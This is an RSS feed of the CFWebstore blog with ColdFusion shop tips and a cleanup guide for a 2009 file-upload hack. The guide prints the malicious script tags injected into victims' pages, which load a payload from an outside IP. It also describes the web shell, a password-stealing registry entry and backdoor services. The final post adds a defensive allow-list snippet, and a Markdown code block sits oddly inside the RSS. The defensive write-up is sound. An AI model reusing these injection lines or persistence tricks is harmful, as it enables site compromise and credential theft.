<?xml version="1.0" encoding="utf-8"?>
			
			<rss version="2.0">
			<channel>
			<title>CFWebstore Blog</title>
			<link>http://blog.cfwebstore.com/index.cfm</link>
			<description>The CFWebstore Blog</description>
			<language>en-us</language>
			<pubDate>Thu, 17 May 2012 15:20:00-0400</pubDate>
			<lastBuildDate>Mon, 03 Jan 2011 19:42:00-0400</lastBuildDate>
			<generator>BlogCFC</generator>
			<docs>http://blogs.law.harvard.edu/tech/rss</docs>
			<managingEditor>maryjo@dogpatchsw.com</managingEditor>
			<webMaster>maryjo@dogpatchsw.com</webMaster>
			
			<item>
				<title>Quick Fix for USPS Shipping Rates Problem</title>
				<link>http://blog.cfwebstore.com/index.cfm/2011/1/3/Quick-Fix-for-USPS-Shipping-Rates-Problem</link>
				<description>
				
				Those of you using USPS rates may have noticed they broke sometime around Jan. 2. Apparently when USPS rolled out some price changes for the new year, which also typically includes a bunch of changes to the shipping service names, they included registration/trademark symbols in the API responses, which aren&apos;t supposed to be there. So shopping carts like CFWebstore that use these to determine which rates to show (since they still don&apos;t provide a unique key for each service, DUMB!) aren&apos;t able to properly match due to these extra characters. They are supposed to have it fixed later today, but in the meantime, here&apos;s the fix to strip those characters out. Add these two lines of code *after* the line for v.ServiceName that is around line 374 of uspostal.cfc, and this should fix the problem. 

&lt;code&gt;
v.ServiceName = Replace(v.ServiceName, &quot;&amp;lt;sup&amp;gt;&amp;amp;reg;&amp;lt;/sup&amp;gt;&quot;, &quot;&quot;);
v.ServiceName = Replace(v.ServiceName, &quot;&amp;lt;sup&amp;gt;&amp;amp;trade;&amp;lt;/sup&amp;gt;&quot;, &quot;&quot;);
&lt;/code&gt;

Please note that due to the typical changes to their available services, you may need to update some of the methods in your USPS settings to match the new names. We do plan to roll out an update for USPS shipping later this year that will no longer use the service names to determine which services are used. While USPS does not provide a unique key for each one, only a couple of services share an ID, so rather than deal with such issues every year, we feel it is preferable to simply not offer those few extra services. Hopefully at some point USPS will get around to fixing this major issue with their API so we can more easily work with it. 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Mon, 03 Jan 2011 19:42:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2011/1/3/Quick-Fix-for-USPS-Shipping-Rates-Problem</guid>
				
			</item>
			
			<item>
				<title>ColdFusion Tools and Resources</title>
				<link>http://blog.cfwebstore.com/index.cfm/2010/8/23/ColdFusion-Tools-and-Resources</link>
				<description>
				
				It&apos;s been a while since I posted anything to the blog, so I thought I&apos;d pass on some useful links and tools I&apos;ve been using recently.

The first is the awesome &lt;a href=&quot;http://www.carehart.org/cf411/&quot;&gt;CF411 site&lt;/a&gt; maintained by Charlie Arehart. This is a compendium of links to all kinds of ColdFusion tools, blogs, articles, tutorials, just about anything you might need if you are a ColdFusion developer (or if you just dabble). It&apos;s a HUGE resource that everyone who works with CF should have bookmarked. 

&lt;a href=&quot;http://www.cfquickdocs.com/cf8/&quot;&gt;CFQuickDocs&lt;/a&gt; is a really nice online ColdFusion documentation reference done using Ajax. It is much faster and easier for pulling up tag and function references, and you can easily swap between CF versions as well. 

Local Raleigh CF&apos;er Jim Priest gave a presentation at CFUnited on automation for the CF developer. It included many of the tools and tips that I use myself, such as Find and Run Robot, AutoHotKey, LastPass, Lazarus, etc. Check it out &lt;a href=&quot;http://thecrumb.com/2010/07/30/cfunited-code-and-more/&quot;&gt;here&lt;/a&gt;. 

If you do any development work for clients, learning to use source control is something you should look into. There are a variety of excellent hosting companies that offer SVN and/or Git hosting; &lt;a href=&quot;http://codesion.com/&quot;&gt;Codesion&lt;/a&gt; is one that is very popular and that I use myself. Recently someone pointed me to another option, &lt;a href=&quot;http://unfuddle.com/&quot;&gt;Unfuddle&lt;/a&gt;, which not only hosts your repositories but provides some really top-notch project management and ticket tracking as well, all for very reasonable prices. 

Finally, I recently had a major problem debugging a Flex remoting issue. I ended up solving it by using an HTTP debugging proxy tool. It occurred to me that this may be a really useful tool for many CFWebstore developers as well, if you work with any portions of the code that interact with external servers, like shipping or payment gateways. Basically, an HTTP proxy shows you all the data passing back and forth and greatly assists in determining where a problem might be occurring. My favorite proxy tool is &lt;a href=&quot;http://www.xk72.com/charles/&quot;&gt;Charles&lt;/a&gt;, which has excellent capabilities and a really nice clean interface, but it does cost $50 to purchase. Under the free category, you&apos;ll find &lt;a href=&quot;http://www.fiddlertool.com/fiddler/&quot;&gt;Fiddler&lt;/a&gt;, a free proxy from Microsoft that is fairly widely used and has many plugins available as well. 

Well, that&apos;s about all I have. Feel free to post your favorite tools in the comments (spam will be removed!) 
				</description>
				
				<category>CFWebstore</category>				
				
				<category>ColdFusion</category>				
				
				<pubDate>Mon, 23 Aug 2010 20:43:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2010/8/23/ColdFusion-Tools-and-Resources</guid>
				
			</item>
			
			<item>
				<title>MySQL Null Null Error</title>
				<link>http://blog.cfwebstore.com/index.cfm/2010/3/25/MySQL-Null-Null-Error</link>
				<description>
				
				Not long ago I got an email from a customer having a strange problem with his store. Whenever someone checked a box to remove an item from the shopping cart, the store would throw an error. Reviewing the error dump showed a strange null null error. We&apos;ve seen this in ColdFusion for some time, but in the past it was usually not very reproducible unless there was an error in the code causing a null value. On review though, we could not find anything causing it; the code and all queries involved didn&apos;t show any null values anywhere. 

We did a fair amount of detective work trying to find the cause, and I tried multiple ways to code around it, but the best I could achieve was to reduce the frequency that the error occurred. There was simply no way to do the function without that update being in there at some point and the database continued to routinely dump a null error when it got to it. We updated ColdFusion to version 9 to see if that helped, and tried a different MySQL connector as well, with no luck. 

Finally, we decided to upgrade MySQL to the latest version. It was already on a fairly recent release, but there didn&apos;t seem to be any other possible cause. And bingo, the error is gone! We&apos;re not sure exactly what MySQL was having an issue with, but it does seem this recalculation error is due to some bug in MySQL. 

So if you run across this error, try updating the MySQL version and that should take care of it. We have seen the error in a couple different 5.1.3x versions and it does not seem to occur in 5.1.4x. 
				</description>
				
				<category>CFWebstore</category>				
				
				<category>Database</category>				
				
				<pubDate>Thu, 25 Mar 2010 16:10:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2010/3/25/MySQL-Null-Null-Error</guid>
				
			</item>
			
			<item>
				<title>FCKEditor 2010 Bug</title>
				<link>http://blog.cfwebstore.com/index.cfm/2010/1/27/FCKEditor-2010-Bug</link>
				<description>
				
				If you update to the latest version of the Firefox browser, you may find the WYSIWYG editor in your store will disappear. This is due to a bug in the FCKEditor that is used for this component: it has a browser compatibility check that only goes up to the year 2009! Here&apos;s information on how to correct this if you are affected. You&apos;ll find the editor in the customtags/fckeditor directory of your store. 

&lt;a href=&quot;http://www.petefreitag.com/item/737.cfm&quot; target=&quot;_blank&quot;&gt;FCKEditor Year 2010 Bug&lt;/a&gt; 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Wed, 27 Jan 2010 12:27:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2010/1/27/FCKEditor-2010-Bug</guid>
				
			</item>
			
			<item>
				<title>New Facebook Fan Page</title>
				<link>http://blog.cfwebstore.com/index.cfm/2010/1/22/New-Facebook-Fan-Page</link>
				<description>
				
				I&apos;ve had a number of requests to create a Facebook Fan page for CFWebstore, so here you go! I&apos;ll be posting there from time to time with important updates, news, blog posts, etc., so it&apos;s a great way for you Facebook users to stay informed on the latest CFWebstore news and to network with other users as well. So here&apos;s the link, looking forward to seeing lots of fans on there soon!

&lt;a href=&quot;http://www.facebook.com/pages/CFWebstore/261350544350?ref=ts&quot; target=&quot;_blank&quot;&gt;CFWebstore Facebook Fan Page&lt;/a&gt; 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Fri, 22 Jan 2010 15:01:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2010/1/22/New-Facebook-Fan-Page</guid>
				
			</item>
			
			<item>
				<title>Server Speed Comparisons</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/10/29/Server-Speed-Comparisons</link>
				<description>
				
				Readers of this blog know I&apos;ve been a big fan of the &lt;a href=&quot;http://www.getrailo.org&quot;&gt;Railo&lt;/a&gt; open source CFML server engine. &lt;a href=&quot;http://www.openbluedragon.org&quot;&gt;Open BlueDragon&lt;/a&gt; also continues to improve and has good support from the community. Now we have the new ColdFusion 9 release from Adobe as well to be excited about! I particularly love the new ORM/Hibernate features. It will be some time before many of these new features make their way into CFWebstore (since the product will continue to support older CF versions for some time), but there&apos;s one new feature of CF9 you can take advantage of now...speed! One thing that impressed me so much with Railo was how much faster it ran sites versus CF8 and OBD. CF9 has definitely closed the gap in some areas, particularly object creation. Some very basic speed comparison tests have been posted to various ColdFusion blogs, which you may find interesting if you are looking to migrate to one of these servers. 

&lt;a href=&quot;http://craigkaminsky.posterous.com/unofficial-speed-test-cf8-cf9-and-railo-openb&quot;&gt;Unofficial Speed Test&lt;/a&gt;

&lt;a href=&quot;http://jamiekrug.com/blog/index.cfm/2009/7/21/cfc-creation-time-in-coldfusion-8-9-open-bluedragon-11-and-railo-31&quot;&gt;CFC Creation Time&lt;/a&gt;

&lt;a href=&quot;http://blog.kukiel.net/2009/07/coldfusion-8-9-and-railo-object.html&quot;&gt;Object Creation Test&lt;/a&gt;

On another note, did you know there is a host offering Railo hosting? Check it out!

&lt;a href=&quot;http://www.alurium.com&quot;&gt;Alurium.com&lt;/a&gt;

Vivio Technologies also offers both Railo and Open BlueDragon as options on their Linux VPS plans. If you are up for running your own server, this is one of the cheapest options and gives you great performance that blows shared hosting out of the water! 

&lt;a href=&quot;http://www.viviotech.net&quot;&gt;Vivio Technologies&lt;/a&gt; 
				</description>
				
				<category>ColdFusion</category>				
				
				<pubDate>Thu, 29 Oct 2009 18:32:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/10/29/Server-Speed-Comparisons</guid>
				
			</item>
			
			<item>
				<title>Other ColdFusion File Upload Attacks</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/9/21/Other-ColdFusion-File-Upload-Attacks</link>
				<description>
				
				We&apos;re continuing to see malware injection attacks against ColdFusion sites. The latest attack used the public upload in the popular Galleon software. Read the details here:

&lt;a href=&quot;http://feedproxy.google.com/~r/RaymondCamdensColdfusionBlog/~3/IvgEGhFVr1Q/How-Galleon-was-Hacked&quot;&gt;How Galleon Was Hacked&lt;/a&gt;

It appears to be the same user(s) as the ones that have attacked CFWebstore and FCKEditor installations, so they are clearly continuing to shift tactics in order to infect ColdFusion sites in new ways, and they also change the file names they upload to sites. Be sure to check *any* sites that have upload features that the hackers could make use of. 
				</description>
				
				<category>CFWebstore</category>				
				
				<category>ColdFusion</category>				
				
				<pubDate>Mon, 21 Sep 2009 21:30:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/9/21/Other-ColdFusion-File-Upload-Attacks</guid>
				
			</item>
			
			<item>
				<title>Using Google Analytics</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/8/27/Using-Google-Analytics</link>
				<description>
				
				Google Analytics is a very popular service many merchants use to do tracking on their sites. Typically this involves inserting a small amount of JavaScript into your site. This is very easily accomplished with CFWebstore by pasting the code into your layout page (such as layouts/lay_default.cfm).

What you may find, though, is that you get an error during checkout due to the code not using an https: link. Switching the code to use strictly the https: link will often work, but here is a more elegant solution. Use this JavaScript instead to switch between the http: and https: links (modify the link as needed for whatever analytics service you are using):

&lt;code&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
var gaJsHost = ((&quot;https:&quot; == document.location.protocol) ? &quot;https://ssl.&quot; : &quot;http://www.&quot;);
document.write(unescape(&quot;%3Cscript src=&apos;&quot; + gaJsHost + &quot;google-analytics.com/urchin.js&apos; type=&apos;text/javascript&apos;%3E%3C/script%3E&quot;));
&lt;/script&gt;
&lt;/code&gt;

Now your site won&apos;t throw any errors! 
				</description>
				
				<category>CFWebstore</category>				
				
				<category>Miscellaneous</category>				
				
				<pubDate>Thu, 27 Aug 2009 19:19:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/8/27/Using-Google-Analytics</guid>
				
			</item>
			
			<item>
				<title>Redirecting Multiple Domains to One</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/7/28/Redirecting-Multiple-Domains-to-One</link>
				<description>
				
				It&apos;s common these days to have multiple domain pointers to a website. I might for instance have cfwebstore.com, cfwebstore.net, dogpatchsoftware.com, etc. all pointing to my site. Things become a bit problematic when using ecommerce software and you need to use SSL to check out. CFWebstore has a variety of security measures that rely on the SSL having the same domain name as the primary site. So what we need to do is redirect the user to the same domain regardless of what domain alias they may have entered the site on. 

Now, it&apos;s fairly easy to just detect these and redirect the user back to the main home page on your primary domain. But what if you have users coming into various sub-pages on the site and want to just transparently rewrite the URL? Well, this is easily done using existing variables in CFWebstore. The file you will want to add your code to is fbx_Settings.cfm. Go to around line 293, just before the clearsession section, and add something like this (add a cfcase for each domain you wish to redirect):

&lt;code&gt;
&lt;cfset TheDomain=LCase(CGI.HTTP_HOST)&gt;
&lt;cfswitch expression=&quot;#TheDomain#&quot;&gt;
  &lt;cfcase value=&quot;www.dogpatchsw.com&quot;&gt;
    &lt;cflocation addtoken=&quot;No&quot; url=&quot;http://www.cfwebstore.com/#Request.currentURL#&quot;&gt;
  &lt;/cfcase&gt;
&lt;/cfswitch&gt;
&lt;/code&gt;

There are certainly other ways to do this, but due to the varying types of URLs that CFWebstore creates according to your store settings, this will work for any store regardless of setup. 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Tue, 28 Jul 2009 12:19:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/7/28/Redirecting-Multiple-Domains-to-One</guid>
				
			</item>
			
			<item>
				<title>Details on Dealing with the File Upload Hack</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/7/3/Details-on-Dealing-with-the-File-Upload-Hack</link>
				<description>
				
				Here are some detailed instructions on repairing your site if it&apos;s been hit by the hack that is targeted at older CFWebstore installations. This is compiled from information on the CFWebstore Yahoogroup. I wanted to be cautious about posting it to the public blog as I didn&apos;t want to expose information that would invite attacks from other hackers, but since that information is now fairly easily available, there&apos;s no reason not to provide this, particularly since the list is quite busy and it can be a bit time-consuming to find all the information. Feel free to provide any feedback on this based on your own experiences. 

Basically the hack is making use of an old upload file that would exist on version 5 and older version 6 sites. It might also be found on any recent sites that had been upgraded but had not removed unused files; version 6.41 sites are not known to be vulnerable to the attack regardless of the file(s)&apos; existence. The hackers may also use other venues to attack: there are reports of some FCKEditor and CKEditor installs having similar vulnerabilities, as well as CF8 (cftextarea, which uses FCKEditor). So be on the lookout for *any* upload function on your servers as a possible entry point. In the event that your site was compromised, here are steps to take in order to return to working order. 

Please note that hackers commonly change tactics, and this may not exactly match what you find on your server; there may be differences in the nature of the attack, where it comes from, file names, etc. This is intended to be just a starting point. 

What these hackers do is upload a ColdFusion page (typically index.cfm or image.cfm) with a shell interface to take complete control over your web server. They can browse your file system, upload, view and edit files, add users and services, etc. (It is a ColdFusion variant of the C99 shell script, a somewhat notorious piece of PHP malware.) The hardest part of these current hacks is that the hackers may use this file to do different things on different servers. Typically, you can tell you&apos;ve been hacked by a script being injected into the bottom of all your pages. 

So, here are some suggestions on what to do if you&apos;ve been attacked. First, if you have a backup of your entire server (operating system and all), then do a database backup and restore your system back to before the attack. You can then restore your database information. Skip to step 3 to prevent hackers from coming back.

If you do not have a backup, you&apos;ll need to clean up your sites and server. Here are the steps:

&lt;ol&gt;

&lt;li&gt;Turn off your web sites or put a temporary splash page up before Google has time to identify your site as dangerous. Google is surprisingly fast at finding compromised web pages and visitors may start seeing a warning page when coming to your site. If this happens, you can submit your site to Google Webmaster Tools to be re-evaluated. However it will save time and energy (and protect your site visitors) if you simply turn your site off ASAP.

&lt;li&gt;Clean up the injected code. The hacker inserts 2 different lines of script into your site, one for web pages and one for JavaScript files. The hacker does a search and replace on the entire server, not just the web folders. It is best to do a search and replace from your server&apos;s desktop. A popular app to use for this is &lt;a href=&quot;http://sourceforge.net/projects/jreplace&quot; target=&quot;_new&quot;&gt;jReplace&lt;/a&gt;.

Do a search and replace for the two different script injections (these may change so be sure to match whatever gets injected on your own sites):

&lt;ul&gt;

&lt;li&gt;First, open the Application.cfm of any site. At the bottom you&apos;ll see a line of code like this (it will vary depending on your site and what they inject on it, so adjust accordingly):&lt;br&gt;&lt;br&gt;

&amp;lt;scRipT src= http://203.251.202.94/iis7.0.js &amp;gt;&amp;lt;/sCrIpt &amp;gt;&lt;br&gt;&lt;br&gt;

Use jReplace to replace this code:&lt;br&gt;

Directory:    c:\&lt;br&gt;

File types:   htm,html,asp,php,cfm&lt;br&gt;

Search for:   (the script you found above)&lt;br&gt;

Replace with: (leave field blank)&lt;br&gt;&lt;br&gt;

Be patient, this will take a while to run. You will know it is done when you see the log entries.&lt;br&gt;&lt;br&gt;

&lt;li&gt;Next open any .js file in a web site. At the bottom you&apos;ll find a line of code like:&lt;br&gt;&lt;br&gt;

document.writeln (&quot;&amp;lt;script src=\&quot;http:// 203.251.202.94/iis7.0. js\&quot;&amp;gt;&amp;lt;\/script&amp;gt;&quot;) ;&lt;br&gt;&lt;br&gt;

Copy and replace the entire line as above:&lt;br&gt;

Directory:   c:\&lt;br&gt;

File types:  js,JS&lt;br&gt;
&lt;br&gt;
                        
&lt;/ul&gt;

 
&lt;li&gt;Remove the initial attack files. Typically, you will see an index.cfm and/or image.cfm in the images/accounts folder. You often will find files elsewhere (includes/mxajax is another popular location for them), so you may want to compare with a clean install of the software to find stray files. MOST IMPORTANTLY, go to the customtags directory and delete any cfm file that starts with the word &apos;upload&apos; (there may be 2 or 3). You can also delete the Application.cfm template from the customtags directory as well. If you are on a version 5 store, you may need to modify the users/dsp_account_form.cfm page as well so that it does not include a call to this page (under logo); it&apos;s not a commonly used file, and you can just comment out the entire setting on that page that uses it without needing to change any code elsewhere. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;If you are using ColdFusion 8, it is very possible that the hackers may be using the version of FCKEditor built into ColdFusion to upload the file. If you have cleaned and patched a webstore site and the files all show up again, this is commonly how they are doing it. Although it is possible to turn off the upload feature, the safest thing to do is to delete the entire filemanager directory found under &quot;CFIDE\scripts\ajax\FCKeditor\editor&quot;. ColdFusion updates may put those files back, so be sure to keep that in mind. Be sure to also check your servers for any other upload functions or other installs of FCKEditor, and make sure they are updated and/or patched against a similar exploit. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Clean off any other recently modified or new files that the hacker(s) may have placed on your sites. Typically we&apos;ve seen them try to add index.cfm files, but you may see them add or modify other files elsewhere on the server. For instance, there was one report of them adding an upload form to the fckeditor.cfm or fckeditor.asp file that will only show when a parameter is passed to it, allowing them access to continue to place files on the server at whim. It is crucial that you find ANY files they might have added, or they can continue to get onto the server. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;As an additional precaution, you can make a change on your Application.cfm page that will help prevent them from running index.cfm or other .cfm files from subdirectories. See the blog entry on this &lt;a href=&quot;http://blog.cfwebstore.com/index.cfm/2009/6/30/A-Code-Snippet-to-Help-Protect-Against-Attacks&quot; target=&quot;_new&quot;&gt;here&lt;/a&gt;. Please note, this will not prevent them from continuing to attack if they have modified any legitimate files in the application, or have access to the CF8 exploit, so it&apos;s critical to take care of these issues as well. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;After cleaning your site(s) take a minute and zip it up as a backup. This will make it easier to just restore should you have missed anything and the hackers get back on. &lt;br/&gt;&lt;br/&gt;


&lt;li&gt;Now it&apos;s time to turn to the server. Typically, the most issues we have seen are with Enterprise servers that have JSP and/or cfregistry/cfexecute enabled. That allows the hacker(s) to do a wide variety of actions, from creating new user accounts, automatically sending them server passwords, installing viruses and malware, and any other amount of mischief. If these kinds of things have happened to your server, you may be best off just rebuilding from scratch, using a backup copy of your websites, database, SSL keys, etc. If you want to try and fix it, here are some suggestions to try:&lt;br/&gt;&lt;br/&gt;

&lt;ul&gt;


&lt;li&gt;Do a search (including hidden and system files) on your server for any file with the word &apos;seraph&apos; in it. Typically you&apos;ll find the original shell file in other locations, such as windows/help. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Scan for viruses. It seems the trojans the hackers installed are not well detected by many scanners; some users have reported the ESET anti-virus to be more effective at finding them. Some have reported upwards of 50 viruses being found, others not finding any. One commonly found trojan is this backdoor trojan (&lt;a href=&quot;http://www.symantec.com/security_response/writeup.jsp?docid=2006-071010-2417-99&amp;tabid=2&quot;&gt;info from Symantec&lt;/a&gt;). This Trojan &quot;calls home&quot; periodically and gets a binary file which it downloads to the Windows temp folder. The binary has a random name. This binary file executes and deletes the web log files, disables logging on web sites, and adds the script tags to your pages. The information on the Symantec site will let you know what you need to remove.&lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Typically you will also find a registry key that lets the hackers run a service to send them your admin passwords when using remote desktop. Typically this is named something like &quot;wminotify&quot; but may be found under another name. A typical entry might look like this:&lt;br/&gt;&lt;br/&gt;

	&lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wminotify]

&quot;DllName&quot;=&quot;wminotify.dll&quot;

&quot;Asynchronous&quot;=dword:00000001

&quot;Impersonate&quot;=dword:00000000

&quot;Startup&quot;=&quot;EventStartup&quot;
&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;

Be sure to also delete the DLL that it refers to, which will be found in the windows/system32 directory. This writes a Boot.dat and Boot.bat in c:\windows\system32 that exposes passwords; delete these files as well.&lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Check for any files that may have been added or modified, particularly in your Windows system directory and dated at the time of the original attack. One user reports these files being modified, and quarantining them stopped continued infections: wpa.dbl, PerfStringBackup.INI, perfh009.dat and perfc009.dat. deploykt.dll was another file found to be suspicious. &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Any number of other changes on the server may have been made. Here are some things to look out for: &lt;br/&gt;&lt;br/&gt;

&lt;ul&gt;

&lt;li&gt;Installation of a service called &quot;microsoft .net framework tpm&quot; (no such service) that hooks your svchost.exe (and associated registry entries). You need to find the associated process (command line: tasklist /svc) that is using that service and stop it. Then delete the service (command line: sc delete actual_service_name). Reboot the server.&lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Adsutil.vbs and gethashes.exe in c:\ (shouldn&apos;t be there).&lt;br/&gt;&lt;br/&gt;

 
&lt;li&gt;New user created and assigned Admin privileges.&lt;br/&gt;&lt;br/&gt;

&lt;li&gt;New user directory c:\documents and settings\new_user (replace with actual name)&lt;br/&gt;&lt;br/&gt;

&lt;li&gt;All Users directory in c:\documents and settings\all users has cmd.exe (shouldn&apos;t be there)&lt;br/&gt;&lt;br/&gt;
 
&lt;li&gt;Existence of malicious code in: C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files\root\some_number&lt;br/&gt;&lt;br/&gt;
 
&lt;li&gt;IIS Settings to disable logging (need to be re-enabled).&lt;br/&gt;&lt;br/&gt;
 
&lt;li&gt;Addition of JSP files in attacked website root with malicious code.&lt;br/&gt;&lt;br/&gt;
 
&lt;li&gt;Addition of boot.aspx or boot.cfm in attacked website root with malicious code. (probably sets up the hack).&lt;br/&gt;&lt;br/&gt;

&lt;/ul&gt;

&lt;li&gt;Other users have reported a variety of files in the windows system folder that seem to have been modified or added at the time the site was infected, so be sure to look for any suspicious files.  &lt;br/&gt;&lt;br/&gt;

&lt;li&gt;Once you are successful in restoring your server and patching the vulnerabilities, be sure to change all your passwords, as a precaution against any areas that the hackers may have gained access to. &lt;br/&gt;&lt;br/&gt;


&lt;li&gt;Be sure to also lock ColdFusion down. Disable JSP handling unless you absolutely need it (follow Adobe instructions &lt;a href=&quot;http://livedocs.adobe.com/coldfusion/8/htmldocs/configuring_12.html&quot;&gt;here&lt;/a&gt;) and ideally set up ColdFusion to run under a restricted user account that has no access to Windows directories (with the exception of windows/fonts for cfdocument support). You may want to try and block the IP addresses of the attackers if you don&apos;t need to allow access from foreign countries like China. Ideally, have any users on CFWebstore upgrade when possible to the latest version, which has much better security against this and other types of attacks. 


&lt;/ul&gt;

&lt;/ol&gt;

&lt;br/&gt;&lt;br/&gt;
Hope this is useful, if you need additional help, drop by the yahoogroup for more detailed discussions on exactly what steps people are taking, and any changes we have seen in the attack methods the hackers are using. And if you are having problems getting running again, feel free to contact CFWebstore support for assistance. 
				</description>
				
				<category>CFWebstore</category>				
				
				<pubDate>Fri, 03 Jul 2009 15:32:00-0400</pubDate>
				<guid>http://blog.cfwebstore.com/index.cfm/2009/7/3/Details-on-Dealing-with-the-File-Upload-Hack</guid>
				
			</item>
			
			<item>
				<title>A Code Snippet to Help Protect Against Attacks</title>
				<link>http://blog.cfwebstore.com/index.cfm/2009/6/30/A-Code-Snippet-to-Help-Protect-Against-Attacks</link>
				<description>
				
				Here&apos;s an easy code modification that is a nice security addition for sites, particularly older stores, and will help somewhat against the recent attacks. Please note that this is far from a comprehensive fix and depending on the level of access the hackers gained, may not help if you have already been attacked. See the links below for more detailed information on dealing with attacked sites for comprehensive details on cleaning up sites. 

Version 6 contains a lot of additional code to protect against XSS, SQL injection, session spoofing and other attacks, which makes it considerably harder to break into, and it is STRONGLY recommended that you upgrade to the latest release if at all possible. If you are running an older version, there&apos;s a greater chance that a hacker can get access to secure areas of your store, and once in there they have access to a lot of things that could compromise your site. Be sure to use strong passwords, change your username regularly, use SFTP if possible, etc. to keep your site secure. What this code does is make sure that a CFM file a hacker has uploaded and hidden in a subdirectory cannot be run on your server: the old check below compares only the file name taken from cgi.script_name, so an uploaded go.cfm in any subdirectory would pass it, while the replacement compares the full path of the template actually being executed (GetBaseTemplatePath()) against the store directory. In the Application.cfm file, replace this section of code (the exact file list may differ depending on your version):

&lt;code&gt;
&lt;cfset directAccessFiles=&quot;#request.self#,sitemap.cfm,go.cfm,image.cfm&quot;&gt;
&lt;cfif not listFindNoCase(directaccessfiles,getfilefrompath(cgi.script_name))&gt;
    &lt;cflocation url=&quot;#request.self#&quot; addtoken=&quot;No&quot;&gt;
&lt;/cfif&gt;
&lt;/code&gt;

with this code:

&lt;code&gt;
&lt;!--- Only these templates may be requested directly; anything else (including an uploaded
      file in a subdirectory) is sent back to the store home page. The admin path below uses
      a backslash because this targets Windows; on Linux/Unix write admin/index.cfm instead. ---&gt;
&lt;cfif &quot;#GetDirectoryFromPath(GetCurrentTemplatePath())#index.cfm&quot; NEQ GetBaseTemplatePath()
  AND &quot;#GetDirectoryFromPath(GetCurrentTemplatePath())#sitemap.cfm&quot; NEQ GetBaseTemplatePath()
  AND &quot;#GetDirectoryFromPath(GetCurrentTemplatePath())#go.cfm&quot; NEQ GetBaseTemplatePath()
  AND &quot;#GetDirectoryFromPath(GetCurrentTemplatePath())#image.cfm&quot; NEQ GetBaseTemplatePath()
  AND &quot;#GetDirectoryFromPath(GetCurrentTemplatePath())#admin\index.cfm&quot; NEQ GetBaseTemplatePath()&gt;
    &lt;cflocation url=&quot;/index.cfm&quot;&gt;
&lt;/cfif&gt;
&lt;/code&gt;

Please note, if your store is not in your webroot directory, be sure to include the path to the store in the cflocation (such as url=&quot;/store/index.cfm&quot;). Also depending on your version, the list of files allowed may be slightly different from these, so adjust as necessary. Two more things to keep in mind: the comparison is case-insensitive (NEQ ignores case), which is what you want on Windows, and the check only runs for templates whose nearest Application.cfm is this one. ColdFusion uses the closest Application.cfm walking up from the requested template, so a subdirectory that carries its own Application.cfm is not covered by it. Treat this as a backstop alongside removing write access to the webroot, not as a replacement for it. 
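As an added example (this is not CFWebstore&apos;s own code), here is the same check written as an allow-list that works on both Windows and Linux and logs what it blocks. It assumes Application.cfm lives in the store root, that the template names listed are the ones your version exposes, and that the log file name cfwebstore_security is simply a name chosen for this example:

```cfml
&lt;!--- Added example, not CFWebstore&apos;s own code: an allow-list form of the Application.cfm check.
      Assumes Application.cfm sits in the store root and that the templates listed are the
      ones your version exposes (adjust the list as described above). ---&gt;
&lt;cfset storeRoot = GetDirectoryFromPath(GetCurrentTemplatePath())&gt;
&lt;cfset allowedTemplates = &quot;index.cfm,sitemap.cfm,go.cfm,image.cfm,admin/index.cfm&quot;&gt;

&lt;!--- Compare full paths, never just file names: a go.cfm uploaded into a hidden
      subdirectory must not match. Separators are normalised so the same code works
      on Windows (backslash) and Linux (forward slash). ---&gt;
&lt;cfset requestedPath = Replace(GetBaseTemplatePath(), &quot;\&quot;, &quot;/&quot;, &quot;ALL&quot;)&gt;
&lt;cfset storeRootNorm = Replace(storeRoot, &quot;\&quot;, &quot;/&quot;, &quot;ALL&quot;)&gt;

&lt;cfset isAllowed = false&gt;
&lt;cfloop list=&quot;#allowedTemplates#&quot; index=&quot;tpl&quot;&gt;
    &lt;!--- CompareNoCase returns 0 when equal; Windows paths are not case sensitive ---&gt;
    &lt;cfif CompareNoCase(storeRootNorm &amp; tpl, requestedPath) EQ 0&gt;
        &lt;cfset isAllowed = true&gt;
        &lt;cfbreak&gt;
    &lt;/cfif&gt;
&lt;/cfloop&gt;

&lt;cfif NOT isAllowed&gt;
    &lt;!--- Log the attempt so you can see what is being probed, then send the request to
          the home page. addtoken=&quot;no&quot; keeps CFID/CFTOKEN out of the redirect URL.
          The log file name cfwebstore_security is just a name chosen for this example. ---&gt;
    &lt;cflog file=&quot;cfwebstore_security&quot; type=&quot;warning&quot;
           text=&quot;Blocked direct request for #GetBaseTemplatePath()# from #cgi.remote_addr#&quot;&gt;
    &lt;cflocation url=&quot;/index.cfm&quot; addtoken=&quot;no&quot;&gt;
&lt;/cfif&gt;
```

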